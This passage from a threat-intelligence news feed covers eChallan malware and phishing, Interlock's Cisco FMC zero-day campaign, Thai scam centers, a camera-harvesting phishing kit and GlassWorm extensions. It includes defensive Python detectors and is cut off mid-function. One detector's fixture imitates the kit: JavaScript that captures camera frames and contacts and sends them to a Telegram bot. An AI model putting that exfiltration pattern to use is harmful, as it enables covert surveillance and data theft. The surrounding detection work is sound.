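The dropper-then-hidden-payload behaviour described above can be checked statically once an APK is decoded: the stage-one app declares a launcher activity and asks for REQUEST_INSTALL_PACKAGES, while the second stage declares no launcher activity, takes SMS and call permissions, and registers a VpnService. The script below is an added example written for this page, not CERT-In or Cyble tooling; the two manifests it parses are constructed stubs with hypothetical package names, not the manifests of the real RTO Challan.apk samples.

```python
"""Static triage of a decoded AndroidManifest.xml for dropper and hidden-payload
traits: a visible stage that can install a second APK, and a hidden stage that
takes SMS/call permissions and registers a VpnService.

Added example, not CERT-In or Cyble code. Both manifests are constructed for
illustration (hypothetical package names); decode a real APK with apktool first.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
A = "{%s}" % ANDROID_NS  # ElementTree's prefix for android:* attributes

# Permissions matching the behaviour reported for this campaign.
RISKY_PERMISSIONS = {
    "android.permission.READ_SMS": "read SMS (OTP theft)",
    "android.permission.RECEIVE_SMS": "intercept incoming SMS",
    "android.permission.READ_CALL_LOG": "read call history",
    "android.permission.CALL_PHONE": "place calls",
    "android.permission.SYSTEM_ALERT_WINDOW": "draw overlays (fake bank/challan screens)",
    "android.permission.REQUEST_INSTALL_PACKAGES": "install a second APK (dropper)",
    "android.permission.FOREGROUND_SERVICE": "stay resident in the background",
}


def triage_manifest(xml_text: str) -> dict:
    """Return the indicators found in one decoded manifest."""
    root = ET.fromstring(xml_text)
    app = root.find("application")
    activities = app.findall("activity") if app is not None else []
    services = app.findall("service") if app is not None else []

    declared = {p.get(A + "name") for p in root.findall("uses-permission")}
    risky = {p: RISKY_PERMISSIONS[p] for p in declared if p in RISKY_PERMISSIONS}

    # No MAIN/LAUNCHER activity means no icon in the app drawer: this is how
    # the payload stage stays out of the app list while the dropper is visible.
    has_launcher = any(
        "android.intent.action.MAIN" in {a.get(A + "name") for a in f.findall("action")}
        and "android.intent.category.LAUNCHER" in {c.get(A + "name") for c in f.findall("category")}
        for act in activities
        for f in act.findall("intent-filter")
    )

    # A service protected by BIND_VPN_SERVICE is how an app registers a
    # VpnService; once the user accepts the VPN prompt, device traffic is
    # routed through the app and can be inspected or redirected.
    vpn_service = any(
        s.get(A + "permission") == "android.permission.BIND_VPN_SERVICE" for s in services
    )

    verdict = []
    if "android.permission.REQUEST_INSTALL_PACKAGES" in risky:
        verdict.append("dropper")
    if not has_launcher:
        verdict.append("hidden")
    if vpn_service:
        verdict.append("vpn-interception")
    if {"android.permission.READ_SMS", "android.permission.RECEIVE_SMS"} & set(risky):
        verdict.append("sms-stealer")
    return {
        "package": root.get("package"),
        "risky_permissions": risky,
        "launcher_icon": has_launcher,
        "vpn_service": vpn_service,
        "verdict": verdict,
    }


# Constructed stage-one manifest: visible in the drawer, only wants to install
# another package (the "Install Update" prompt).
DROPPER_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="example.rto.challan">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES"/>
  <application android:label="RTO Challan">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
  </application>
</manifest>"""

# Constructed stage-two manifest: no launcher icon, SMS/call access, overlay
# permission for fake payment screens, and a VpnService.
PAYLOAD_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="example.rto.challan.update">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.CALL_PHONE"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <uses-permission android:name="android.permission.FOREGROUND_SERVICE"/>
  <application android:label="System Update">
    <activity android:name=".OverlayActivity"/>
    <service android:name=".TunnelService"
        android:permission="android.permission.BIND_VPN_SERVICE">
      <intent-filter><action android:name="android.net.VpnService"/></intent-filter>
    </service>
  </application>
</manifest>"""

if __name__ == "__main__":
    for m in (DROPPER_MANIFEST, PAYLOAD_MANIFEST):
        r = triage_manifest(m)
        print(r["package"], r["verdict"], sorted(r["risky_permissions"]))
```

On a real sample, run it over the manifest apktool writes out for each stage; a dropper that is itself visible but whose downloaded update has no launcher entry and a BIND_VPN_SERVICE service matches the two-stage pattern described above.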

Parallel Rise of Browser-Based eChallan Phishing

Last year, Cyble Research and Intelligence Labs (CRIL) reported a related surge in browser-based phishing attacks leveraging the eChallan ecosystem. Unlike APK-based threats, this variation does not require users to install any application, significantly lowering the barrier to compromise.

These phishing campaigns begin similarly, with SMS messages targeting Indian vehicle owners. The messages contain deceptive URLs that mimic official eChallan portals. Once clicked, users are redirected to cloned websites that closely replicate government platforms, complete with official insignia and branding.

At the time of investigation, many of these phishing domains remained active, indicating an ongoing and well-maintained operation rather than isolated incidents.

Anatomy of the Phishing Attack

The browser-based eChallan fraud follows a structured attack chain:
  • Stage 1: SMS Delivery: Victims receive messages claiming overdue fines, often with threatening language about legal action. The sender appears as a regular mobile number, increasing credibility.
  • Stage 2: Fake Portal Redirection: Clicking the link redirects users to phishing domains hosted on IP addresses such as 101[.]33[.]78[.]145. Interestingly, some pages were originally written in Spanish and then translated into English, suggesting reuse of global phishing templates.
  • Stage 3: Fabricated Challan Generation: Users are asked to input details such as vehicle number, challan number, or driving license number. Regardless of the input, the system generates a realistic-looking challan, often with a fine amount such as INR 590 and a near-term deadline. This psychological tactic reinforces trust.
  • Stage 4: Financial Data Harvesting: When users proceed to payment, they are directed to a fake payment page that accepts only credit or debit cards. No legitimate payment gateway is used. Instead, sensitive details such as CVV, expiry date, and cardholder name are captured directly. Testing revealed that even invalid card entries are accepted, confirming that data is harvested regardless of transaction success.

Shared Infrastructure and Expanding Threat Landscape

Investigations revealed that this Android malware campaign and the related phishing operations are supported by shared backend infrastructure. Multiple domains impersonating eChallan, logistics services such as DTDC and Delhivery, and financial institutions were hosted on the same IP addresses.

Over 36 phishing domains linked to RTO Challan scams were identified on a single server. Another IP, 43[.]130[.]12[.]41, hosted additional domains mimicking Parivahan services using deceptive naming patterns such as “parizvaihen[.]icu.”
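The naming pattern parizvaihen[.]icu and the shared hosting on 43[.]130[.]12[.]41 are the kind of indicators an analyst expands on: refang them, score the registrable label against the impersonated brand names, and pivot on the hosting IP to find sibling domains. The following is an added example written for this page, not Cyble or CERT-In code; the brand tokens and the two indicators above come from the article, while the other hostnames, the IP pairings in SAMPLE_RECORDS and the ALLOWLIST entry are constructed assumptions.

```python
"""Triage of defanged eChallan-style indicators: refang, score each domain's
registrable label against the impersonated brands with an edit distance, and
pivot on the hosting IP to expose sibling phishing domains on shared servers.

Added example, not Cyble or CERT-In tooling. Brand tokens and the indicators
parizvaihen[.]icu / 43[.]130[.]12[.]41 come from the article; the remaining
hostnames, the IP pairings in SAMPLE_RECORDS and the ALLOWLIST are assumptions.
"""
import re

BRANDS = ("parivahan", "echallan", "dtdc", "delhivery")
# Assumed legitimate domain; replace with your own vetted list.
ALLOWLIST = {"parivahan.gov.in"}


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into a usable string."""
    return ioc.replace("[.]", ".").replace("[:]", ":").replace("hxxp", "http")


def levenshtein(a: str, b: str) -> int:
    """Edit distance via the classic two-row dynamic programming table."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_label(fqdn: str) -> str:
    """Second-level label; a public-suffix list would be more precise."""
    parts = fqdn.split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def classify(domain: str, threshold: float = 0.7) -> dict:
    """Score one domain against the brand list; allowlisted domains pass."""
    fqdn = refang(domain).lower().strip(".")
    if fqdn in ALLOWLIST or any(fqdn.endswith("." + a) for a in ALLOWLIST):
        return {"domain": fqdn, "verdict": "allowlisted", "brand": None, "similarity": 1.0}
    # Drop digits and hyphens so "e-challan2" still compares as "echallan".
    label = re.sub(r"[^a-z]", "", registrable_label(fqdn))
    best_brand, best_sim = None, 0.0
    for brand in BRANDS:
        if brand in label:
            sim = 1.0  # brand embedded in the label, e.g. echallan-pay
        else:
            sim = 1.0 - levenshtein(label, brand) / max(len(label), len(brand))
        if sim > best_sim:
            best_brand, best_sim = brand, sim
    verdict = "lookalike" if best_sim >= threshold else "unrelated"
    return {"domain": fqdn, "verdict": verdict, "brand": best_brand, "similarity": round(best_sim, 3)}


def pivot_by_ip(records):
    """Group (domain, ip) pairs by hosting IP so one confirmed phishing
    domain exposes its siblings on the same server."""
    groups = {}
    for domain, ip in records:
        groups.setdefault(refang(ip), []).append(refang(domain).lower())
    return groups


# Constructed passive-DNS-style records (domain, ip). Only the first pair
# reflects the article; the rest are illustrative.
SAMPLE_RECORDS = [
    ("parizvaihen[.]icu", "43[.]130[.]12[.]41"),
    ("echallan-pay[.]icu", "43[.]130[.]12[.]41"),
    ("intranet-portal.example", "192.0.2.10"),
    ("echallan.parivahan.gov.in", "192.0.2.20"),
]

if __name__ == "__main__":
    for domain, _ in SAMPLE_RECORDS:
        print(classify(domain))
    for ip, doms in pivot_by_ip(SAMPLE_RECORDS).items():
        print(ip, doms)
```

The similarity threshold is deliberately loose (parizvaihen scores about 0.73 against parivahan) because these kits mutate a few characters at a time; pair the score with the IP pivot rather than blocking on the score alone, and keep the allowlist current so legitimate government subdomains are never flagged.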
Interlock Ransomware Leveraged Cisco FMC Zero-Day 36 Days Before Patch

By Ashish Khaitan, 19 March 2026, 08:16

Amazon’s threat intelligence teams have uncovered a new cyber campaign linked to the Interlock ransomware group. The campaign centers around a flaw affecting Cisco Secure Firewall Management Center (FMC) software. The vulnerability, tracked as CVE-2026-20131, was disclosed by Cisco on March 4. It allows an unauthenticated remote attacker to execute arbitrary Java code with root privileges on affected FMC devices. However, research conducted through Amazon MadPot, a global honeypot network designed to observe malicious activity, revealed that Interlock had already begun exploiting this flaw as early as January 26, 2026, 36 days before public disclosure.

This meant the attackers were operating with a zero-day advantage, enabling them to compromise organizations before defenders were even aware of the risk. According to Amazon’s findings, the exploitation involved crafted HTTP requests targeting specific paths on vulnerable systems. These requests carried embedded Java code and two URLs: one delivering configuration data to support the exploit, and another confirming successful compromise by triggering an HTTP PUT request from the victim system.

To deepen the investigation, researchers simulated a compromised device by responding to the attacker’s verification mechanism. This triggered the next phase of the attack, in which Interlock issued commands to download and execute a malicious Linux binary.

Amazon MadPot Reveals Interlock’s Toolkit

The use of Amazon MadPot proved critical in exposing the full scope of the operation. A misconfigured infrastructure server used by the attackers inadvertently revealed their entire toolkit, including reconnaissance scripts, custom remote access trojans (RATs), and evasion mechanisms, offering rare visibility into Interlock’s multi-stage attack chain.

The infrastructure was organized to separate data by target, with directories used both to distribute tools and to collect stolen information. This level of organization reflects a structured and repeatable attack methodology.

Importantly, Amazon confirmed that its own cloud infrastructure and customer workloads were not impacted by this campaign.

Interlock Ransomware Tactics and Attribution

The recovered malware and artifacts were attributed to the Interlock ransomware family based on several consistent indicators, including a ransom note and a Tor-based negotiation portal aligned with Interlock’s known branding and operational style.

The ransom notes notably referenced multiple data protection regulations, a tactic Interlock uses to pressure victims by threatening not only data encryption but also potential regulatory penalties. Each victim was assigned a unique organization identifier, consistent with the group’s tracking model.

Historically, Interlock has targeted industries where disruption creates maximum leverage. The education sector has been the most affected, followed by engineering, construction, manufacturing, healthcare, and public sector organizations.

Temporal analysis of the attack activity suggests the operators likely work in a UTC+3 time zone, with activity typically beginning around 08:30, peaking between 12:00 and 18:00, and declining overnight.
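The UTC+3 working-hours attribution above is a repeatable technique: shift every attack timestamp into each candidate time zone and pick the offset under which the most activity lands in a normal workday. Below is an added example, not Amazon’s analysis code; the 08:00-18:00 workday window is an assumption, and SAMPLE_EVENTS is a constructed set of timestamps shaped like the reported pattern, not data from the report.

```python
"""Working-hours inference from attack timestamps. For each candidate UTC
offset, convert every event to local time and measure how much activity
falls inside an assumed 08:00-18:00 workday; the best-fitting offset is the
likely operator time zone.

Added example, not Amazon's analysis code. SAMPLE_EVENTS is constructed to
mimic the reported shape (start ~08:30, peak 12:00-18:00, decline overnight)
and contains no data from the report.
"""
from collections import Counter
from datetime import datetime, timedelta, timezone


def parse_utc(stamp: str) -> datetime:
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def hourly_profile(events, offset_hours: int) -> Counter:
    """Count events per local hour after shifting to the candidate offset."""
    tz = timezone(timedelta(hours=offset_hours))
    return Counter(parse_utc(e).astimezone(tz).hour for e in events)


def workday_score(profile: Counter, start: int = 8, end: int = 18) -> float:
    """Fraction of activity inside the assumed workday [start, end)."""
    total = sum(profile.values())
    inside = sum(n for h, n in profile.items() if start <= h < end)
    return inside / total if total else 0.0


def infer_offset(events, candidates=range(-12, 15)):
    """Return (best_offset, {offset: score}); ties break toward UTC."""
    scores = {off: workday_score(hourly_profile(events, off)) for off in candidates}
    best = max(scores, key=lambda off: (scores[off], -abs(off)))
    return best, scores


def activity_summary(events, offset_hours: int):
    """Earliest local hour with activity and the three busiest local hours."""
    profile = hourly_profile(events, offset_hours)
    peak = sorted(profile, key=lambda h: (-profile[h], h))[:3]
    return min(profile), peak


# Constructed UTC events as (hour, minute, count) that read as a UTC+3
# workday: 05:30Z is 08:30 local, 14:50Z is 17:50 local, 18:10Z is 21:10 local.
_SHAPE = [(5, 30, 2), (6, 15, 3), (7, 40, 3), (9, 5, 6), (10, 30, 6), (11, 10, 7),
          (12, 45, 7), (13, 20, 6), (14, 50, 5), (16, 30, 2), (18, 10, 1)]
SAMPLE_EVENTS = [
    "2026-02-%02dT%02d:%02d:00Z" % (2 + i % 5, h, m)
    for h, m, n in _SHAPE for i in range(n)
]

if __name__ == "__main__":
    best, scores = infer_offset(SAMPLE_EVENTS)
    start, peak = activity_summary(SAMPLE_EVENTS, best)
    print("best offset UTC%+d  score=%.3f" % (best, scores[best]))
    print("first activity hour %02d:00, busiest hours %s" % (start, peak))
```

Neighbouring offsets score almost as well (UTC+2 and UTC+4 here differ from UTC+3 by only a few events), so treat the result as one signal alongside locale artifacts, weekend gaps, and daylight-saving shifts, and collect enough events to separate adjacent zones.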

Post-Exploitation

Once access is gained through CVE-2026-20131, Interlock deploys a range of tools to expand control within the compromised network. A PowerShell-based reconnaissance script systematically collects detailed system and network information, including installed software, running services, browser data, and active connections. The script organizes this data into per-host directories on a centralized network share, compressing it into ZIP archives for exfiltration. This structured approach indicates preparation for large-scale ransomware deployment across multiple systems.

Interlock uses multiple RATs to maintain persistent access. One variant, written in JavaScript, suppresses debugging output and gathers system details before establishing encrypted communication with command-and-control servers over WebSockets. Messages are encrypted with RC4 using a unique key for each transmission. A second variant, implemented in Java, provides the same capabilities using different libraries. This dual-implementation strategy ensures continued access even if one version is detected and removed.

To hide their tracks, Interlock employs a Bash script that turns compromised Linux servers into HTTP reverse proxies. These proxies forward traffic to attacker-controlled systems while erasing logs every five minutes, making forensic analysis extremely difficult.

Fileless Backdoors and Advanced Techniques

One of the more advanced components observed in the campaign is a memory-resident webshell. Delivered as a Java class, it operates entirely in memory, avoiding disk-based detection. It intercepts HTTP requests and executes encrypted payloads dynamically within the Java Virtual Machine. Additionally, a lightweight TCP server tool was identified, used to verify successful exploitation by confirming connectivity on a specific port.

Interlock also blends malicious activity with legitimate software. The group deployed ConnectWise ScreenConnect, a commercial remote desktop tool, to maintain access while avoiding detection. This redundancy ensures attackers retain control even if custom malware is removed.

Other tools found in the attack environment include Volatility, typically used for memory forensics, and Certify, an offensive security tool targeting Active Directory Certificate Services. These tools enable credential access, privilege escalation, and persistent footholds within compromised environments.
FBI Intensifies Crackdown on Thai Scam Centers Targeting Americans

By Ashish Khaitan, 18 March 2026, 04:20

The first contact often seems harmless: a friendly message, casual conversation, or even a budding online romance. But for many Americans, these interactions mark the beginning of a devastating financial scam. Authorities say these crimes trace back to organized scam centers in Southeast Asia. Now, the FBI in Thailand is working closely with regional partners to dismantle these operations and protect Americans from losing billions of dollars each year.

According to U.S. officials, these scam centers are not small-time operations. Instead, they are large, coordinated criminal enterprises operating out of fortified compounds. Victims are often lured through social media or messaging platforms, where scammers build trust over time. In some cases, fraudsters pose as romantic partners; in others, they promote cryptocurrency investments, promising quick returns. Weeks or months later, victims find their savings gone, transferred overseas, converted into digital assets, and scattered across complex financial networks.

How Scam Centers Target Americans Through Deception and Trust

Speaking during a Department of State media briefing on February 24, 2026, FBI Deputy Assistant Director Scott Schelble described these scam centers as “industrial-scale fraud operations.” He emphasized that Americans are losing billions of dollars annually, with many victims suffering not only financial ruin but also emotional distress. Retirees, small-business owners, and individuals seeking companionship are among the most frequently targeted.

Schelble explained that these scam centers operate with a structure similar to legitimate corporations. Workers are often recruited through fake job advertisements promising high salaries abroad. Once they arrive, however, their passports are confiscated, and they are forced to work under threat of violence. Armed guards monitor the compounds, and trafficked individuals are made to follow scripted interactions designed to extract as much money as possible from victims.

One of the fastest-growing fraud methods linked to these scam centers is known as “pig butchering.” In this scheme, scammers gradually build relationships with victims, often starting with messages sent to “wrong numbers.” Over time, they introduce investment opportunities, typically involving cryptocurrency. Victims are shown convincing but entirely fake platforms displaying large profits. When they attempt to withdraw funds, they are asked to deposit additional money for fees or taxes. Eventually, the platform disappears, along with their investment.

“Americans are losing billions of dollars a year to these types of scams. And in many cases, victims lose their life savings,” Schelble said.

FBI Expands Operations Against Scam Centers in Thailand

Rather than focusing solely on individual scammers, investigators are targeting the broader networks that support these operations. This includes tracking cryptocurrency transactions, identifying financial intermediaries, and collaborating with banks and exchanges to freeze suspicious accounts.

In August 2025, the FBI’s Bangkok office formed a joint task force with the Royal Thai Police to address the issue. The effort has since expanded, with agents rotating into Thailand on six-month assignments to support investigations. Additional personnel have also been deployed with assistance from the U.S. Department of State.

Image: FBI’s Ben Virtue and Thai police with phones seized from scam centers (Source: FBI)

Ben Virtue, the FBI’s law enforcement attaché in Bangkok, highlighted the importance of international cooperation. “We’re working the problem together,” he said. “The Royal Thai Police are true partners in this fight against the organized crime syndicates running these scam compounds. Without their partnership, this would not be possible.”

Recent operations by the task force have yielded results. Authorities seized more than 8,000 phones and 1,300 hard drives from suspected scam centers, providing valuable evidence for ongoing investigations. In parallel efforts, a major technology company disabled over 150,000 accounts linked to scam networks, while Thai authorities arrested 21 individuals connected to these activities.

The U.S. Department of Justice has also stepped in, establishing a Scam Center Strike Force in November 2025. The initiative focuses on combating cryptocurrency-related fraud tied to Southeast Asian scam centers. So far, the strike force has frozen and seized more than $580 million in digital assets.
AI-Driven Phishing Campaign Uses Browser Permissions to Harvest Sensitive Data

By Ashish Khaitan, 17 March 2026, 06:00

A new AI-driven phishing campaign uncovered by Cyble Research & Intelligence Labs (CRIL) demonstrates how attackers are moving beyond traditional credential theft and adopting more invasive, technology-driven tactics.

According to CRIL, the campaign has been active since early 2026 and relies on a wide range of social engineering lures, including themes such as an ID scanner, Telegram ID freezing, and “Health Fund AI.” These deceptive entry points are designed to trick users into granting access to hardware features such as cameras and microphones under the guise of verification or account recovery.

Once permissions are granted, the malicious scripts begin collecting extensive data, including images, video recordings, microphone audio, device specifications, contact details, and approximate geographic location. The stolen data is then transmitted to attacker-controlled systems via Telegram bots, making exfiltration quick and efficient.

Researchers also noted signs of AI-assisted code generation within the campaign’s infrastructure. Structured annotations and unusual emoji-based formatting embedded in the scripts suggest the use of generative AI tools to streamline development and deployment.

Infrastructure and Attack Mechanism

The campaign primarily uses the edgeone.app platform to host phishing pages, enabling scalable and low-cost deployment. These pages impersonate well-known platforms such as TikTok, Instagram, Telegram, and Google Chrome, and even games like Flappy Bird, to gain user trust.

Image: Campaign Overview (Source: Cyble)

Unlike traditional phishing attacks that rely on victims entering credentials, this AI-driven phishing campaign focuses on browser-level permissions. Once a user interacts with a phishing page, JavaScript code triggers permission prompts. If accepted, the script activates the device camera and begins capturing live data.

Image: JavaScript Implementation Used for Browser-Based Photo Capture (Source: Cyble)

A key technique involves rendering a frame from the live video stream onto an HTML5 canvas using ctx.drawImage(), then converting it into a JPEG file via canvas.toBlob(). This file is immediately transmitted to the attackers through the Telegram Bot API. The same process is used for video and audio recordings.

Expanded Data Collection Capabilities

The phishing framework goes beyond simple media capture. It performs extensive device fingerprinting using browser APIs such as:
  • navigator.userAgent
  • navigator.platform
  • navigator.deviceMemory
  • navigator.hardwareConcurrency
  • navigator.connection
  • navigator.getBattery

Through these methods, attackers gather detailed information about the victim’s device, including operating system, browser version, CPU capacity, RAM, network type, and battery status.

Additionally, the script retrieves the victim’s IP address via external services and enriches it with geolocation data such as country, city, latitude, and longitude. This information is aggregated and sent to the attackers before further data collection begins.

Image: Script Fetching Victim IP and Geolocation via External APIs (Source: Cyble)

The campaign also attempts to access contact lists using the browser’s Contacts Picker API. If users grant permission, names, phone numbers, and email addresses are extracted and transmitted.

Role of Telegram in Data Exfiltration

A notable aspect of this campaign is its reliance on Telegram for command-and-control (C2) operations. By using Telegram bots, attackers eliminate the need for complex backend infrastructure. Data such as images, videos, and audio files are sent directly via Bot API methods such as sendPhoto, sendVideo, and sendAudio. This approach simplifies operations while giving attackers immediate access to stolen information.
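The mechanism described in the last three sections (getUserMedia, canvas frame capture with drawImage/toBlob, Telegram Bot API uploads, the Contacts Picker API, navigator fingerprinting, and emoji inside the code) can be matched statically in a page’s JavaScript before anyone grants a permission. The scanner below is an added example written for this page, not Cyble’s detection logic; both JavaScript samples are constructed, the bot token in KIT_JS is a fake placeholder, and the bot-token regex and the ip-geolocation hostname pattern are assumptions.

```python
"""Static scan of a page's JavaScript for the permission-abuse and Telegram
exfiltration pattern: getUserMedia plus canvas frame capture, Telegram Bot
API send* calls, the Contacts Picker API, navigator fingerprinting, and emoji
inside code (reported as an AI-generation hint).

Added example, not Cyble's detection logic. The two JavaScript samples are
constructed; the token in KIT_JS is a fake placeholder, and TOKEN_RE and the
ip-geolocation hostname pattern are assumptions.
"""
import re

INDICATORS = {
    "camera-mic-request": r"getUserMedia\s*\(",
    "frame-capture": r"\.drawImage\s*\(|\.toBlob\s*\(",
    "media-recorder": r"\bMediaRecorder\b",
    "telegram-c2": r"api\.telegram\.org/bot",
    "telegram-send-method": r"/send(Photo|Video|Audio|Document|Message)\b",
    "contacts-picker": r"navigator\.contacts\.select\s*\(",
    "device-fingerprint": r"navigator\.(deviceMemory|hardwareConcurrency|getBattery|connection|platform)\b",
    "ip-geolocation": r"\bip(api|info|-api|geolocation)\.",  # assumed service hostnames
}
# Assumed shape of a Telegram bot token: numeric bot id, colon, long secret.
TOKEN_RE = re.compile(r"\b(\d{8,10}:[A-Za-z0-9_-]{30,})\b")
EMOJI_RE = re.compile("[\U0001F300-\U0001FAFF\u2600-\u27BF]")


def scan_js(source: str) -> dict:
    """Match every indicator, pull out bot tokens, and grade the script."""
    found = [name for name, pat in INDICATORS.items() if re.search(pat, source)]
    tokens = TOKEN_RE.findall(source)
    emoji = len(EMOJI_RE.findall(source))

    captures = {"camera-mic-request", "media-recorder", "frame-capture"} & set(found)
    exfil = "telegram-c2" in found or bool(tokens)
    if captures and exfil:
        verdict = "phishing-kit"   # captures media and ships it to a bot
    elif captures or exfil or "contacts-picker" in found:
        verdict = "review"         # legitimate apps use these APIs too
    else:
        verdict = "clean"
    return {
        "indicators": found,
        "telegram_bot_tokens": tokens,
        "emoji_in_code": emoji,
        "score": len(found) + (1 if emoji else 0),
        "verdict": verdict,
    }


# Constructed sample of the kit pattern (not the real campaign code).
KIT_JS = r'''
const TOKEN = "123456789:AAExampleTokenNotReal_0000000000000";
async function verify() {
  const stream = await navigator.mediaDevices.getUserMedia({video: true, audio: true});
  const video = document.querySelector("video"); video.srcObject = stream;
  const canvas = document.createElement("canvas");
  canvas.getContext("2d").drawImage(video, 0, 0);
  canvas.toBlob(blob => {
    const fd = new FormData(); fd.append("photo", blob, "capture.jpg");
    fetch(`https://api.telegram.org/bot${TOKEN}/sendPhoto?chat_id=1`, {method: "POST", body: fd}); // 📸 sent
  }, "image/jpeg");
  const info = {ua: navigator.userAgent, mem: navigator.deviceMemory, cpu: navigator.hardwareConcurrency};
  const bat = await navigator.getBattery();
  const contacts = await navigator.contacts.select(["name", "tel", "email"], {multiple: true});
  const geo = await fetch("https://ipapi.co/json/").then(r => r.json());
}
'''

# Constructed benign sample: a video-call page that also asks for the camera.
CALL_JS = r'''
async function join() {
  const stream = await navigator.mediaDevices.getUserMedia({video: true, audio: true});
  document.querySelector("#local").srcObject = stream;
  peer.addStream(stream);
}
'''

if __name__ == "__main__":
    for name, src in (("kit", KIT_JS), ("call", CALL_JS)):
        print(name, scan_js(src))
```

A camera request alone is only “review”, since conferencing and KYC pages legitimately use it; the combination of capture, a Telegram bot endpoint and a hard-coded token is what separates a kit from an application. An extracted token is also actionable: it identifies the bot receiving the stolen media and can be reported to Telegram.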

User Interface Deception

To maintain credibility, phishing pages display realistic status messages such as “Capturing photo,” “Sending to server,” and “Photo sent successfully.” These prompts mimic legitimate verification workflows, reinforcing the illusion of authenticity. Once the data is captured and transmitted, the script shuts down the camera and resets the interface, leaving minimal visible traces of the attack.

Risks and Business Impact

The implications of this AI-driven phishing campaign are significant. By collecting biometric and contextual data, attackers gain powerful tools for:
  • Identity theft and account takeover
  • Bypassing video-based verification systems
  • Targeted social engineering attacks
  • Extortion using captured multimedia

For example, images and audio recordings could be used to impersonate victims or bypass KYC (Know Your Customer) checks. Device and location data allow attackers to craft highly personalized attacks, increasing their success rate. Organizations face additional risks, including reputational damage, regulatory exposure, and financial losses. The use of impersonated brands further amplifies the threat by eroding trust in legitimate digital services.

One of the more unusual findings in this campaign is the presence of emojis embedded within the script’s operational logic. While uncommon in manually written malware, such patterns have been linked to AI-assisted code generation. This suggests attackers may be leveraging generative AI tools to accelerate development and scale their operations.
GlassWorm Campaign Expands Through Malicious Open VSX Extensions

By Ashish Khaitan, 16 March 2026, 09:22

A large-scale malicious campaign tied to GlassWorm has expanded within the Open VSX extension ecosystem, introducing a new method of spreading malware through developer tools. Researchers identified at least 72 additional malicious Open VSX extensions beginning January 31, 2026, including several that function as transitive GlassWorm loader extensions aimed at developers.

Rather than reappearing as a completely new operation, GlassWorm has evolved its tactics. Recent analysis shows a notable escalation in how the campaign spreads through Open VSX extensions, shifting from directly embedding malicious code in every extension to exploiting the extension relationship mechanisms of the Visual Studio Code ecosystem.

GlassWorm Exploits Extension Relationships

The campaign abuses two extension manifest fields commonly used by open VSX extensions and compatible editors: extensionPack and extensionDependencies. These fields allow one extension to automatically install additional extensions when the primary extension is installed.

Both settings are declared inside an extension’s package.json file and reference other extensions using the publisher.name identifier. In legitimate scenarios, this functionality provides convenience for developers. For example, extension packs can bundle multiple tools together so that a developer setting up a particular environment can install them all at once.

A legitimate example cited in official documentation shows how a PHP development pack might bundle debugging and language tooling:

    {
      "extensionPack": [
        "xdebug.php-debug",
        "zobo.php-intellisense"
      ]
    }

However, GlassWorm operators have repurposed this functionality to distribute malware indirectly through open VSX extensions.

Because these manifest fields do not require extensions to share the same publisher or namespace, any extension author can reference any other extension. This design allows attackers to publish seemingly harmless extensions that later become indirect malware installers.

Transitive Delivery Expands the GlassWorm Attack Surface 

Unlike earlier iterations where malicious code was embedded directly in extensions, the newer GlassWorm approach enables transitive malware delivery. A benign-looking extension can later be updated to include an extensionPack or extensionDependencies entry that installs a separate malicious extension.

One confirmed example involves otoboss.autoimport-extension, where version 1.5.7 includes an extensionPack reference to oigotm.my-command-palette-extension, while version 1.5.6 references federicanc.dotenv-syntax-highlighting, which has been confirmed as GlassWorm-linked.

Additional live cases were also identified, including:
  • twilkbilk.color-highlight-css 
  • crotoapp.vscode-xml-extension 
These examples illustrate how open VSX extensions that initially appear harmless can later become indirect malware distribution points. This approach reduces visibility of the malicious component and complicates detection efforts.

The strategy also undermines traditional extension reviews. Security teams can no longer rely on examining only the initial release of an extension, since malicious dependencies may be introduced in later updates.
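The review gap described above (a dependency that only appears in a later release, and that may itself pull in further extensions from other publishers) can be checked mechanically by resolving the transitive extensionPack/extensionDependencies closure of each version and diffing them. This is an added example, not code from the article or from Open VSX; the manifest snapshot and the publisher.name identifiers in it are constructed placeholders that mirror the otoboss pattern, not the real extensions named above.

```python
"""Resolve an extension's transitive install closure and diff it across
versions, so a dependency introduced in a later release is surfaced.

Added example. REGISTRY is a constructed snapshot standing in for the
manifests a real check would fetch from the registry for each version.
"""
from typing import Dict, List, Set, Tuple

# (publisher.name, version) -> the package.json fields relevant here.
# All identifiers are placeholders, not real extensions.
REGISTRY: Dict[Tuple[str, str], dict] = {
    ("example-pub.helpful-tool", "1.5.6"): {
        "extensionPack": ["example-pub.helper-theme"],
    },
    ("example-pub.helpful-tool", "1.5.7"): {
        "extensionPack": ["example-pub.helper-theme", "other-pub.command-palette"],
        "extensionDependencies": ["third-pub.syntax-colors"],
    },
    ("example-pub.helper-theme", "latest"): {},
    ("other-pub.command-palette", "latest"): {
        # A second hop: the referenced extension references another one.
        "extensionDependencies": ["fourth-pub.loader-stub"],
    },
    ("third-pub.syntax-colors", "latest"): {},
    ("fourth-pub.loader-stub", "latest"): {},
}

DEP_FIELDS = ("extensionPack", "extensionDependencies")


def direct_deps(manifest: dict) -> Set[str]:
    """Union of both manifest fields that trigger automatic installs."""
    deps: Set[str] = set()
    for field in DEP_FIELDS:
        deps.update(manifest.get(field, []))
    return deps


def lookup(ext_id: str, version: str) -> dict:
    """Manifest from the snapshot, falling back to the 'latest' entry."""
    return REGISTRY.get((ext_id, version)) or REGISTRY.get((ext_id, "latest")) or {}


def transitive_closure(ext_id: str, version: str) -> Set[str]:
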